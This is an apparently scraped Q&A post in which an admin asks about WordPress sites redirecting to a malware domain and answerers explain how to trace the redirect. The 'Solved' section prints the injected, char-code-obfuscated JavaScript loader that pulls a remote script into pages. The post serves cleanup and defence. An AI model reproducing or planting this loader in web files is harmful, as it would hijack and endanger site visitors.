Search code examples
wordpresssecuritycentosmalwarephpjs

WordPress Malware - Redirect to (fast.destinyfernandi.com) - even after scan and clean

I'm living my worse nightmare. I have an CentOS server, that is hosting 10s of WordPress website.

My clients notice that their websites are opening and after loading it is redirected to (fast.destinyfernandi.com) <---- Malware website.

I used ClamAV to detect the malware and clean them manually, without any success.

Here is the example of the Clamscan command result of one of the website:

----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)

But this site is still redirecting to that malware website.

Have anyone came across such an issue?

Please help.

==================================Solved:=============================

The code was injected to all js files

var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Solution

  • There are several ways how your web resource could be redirected to destinyfernandi.

    1. database could be patched and your own ligitimate code does redirect
    2. some injected code in php or JS or html templates does redirect either via window.location or meta or headers of response.

    First discover what address you gets redirected to , whether it is destinyfernandi or some other URL. I mean you could be redirected to some "invisible" URL1 and server which servicing URL1 would redirect browser further to destinyfernandi.

    Once you discover what is the first hop (URL) in redirects you can search for bad URL in source code and database dump.

    There is also a chance that first hop URL ( most likely destinyfernandi) is obfuscated in your code but lets hope it is not the case.

    You can also add break point which fires on redirects which could help you to identify obfuscated piece of JS code:

    window.addEventListener("beforeunload", function() { debugger; }, false)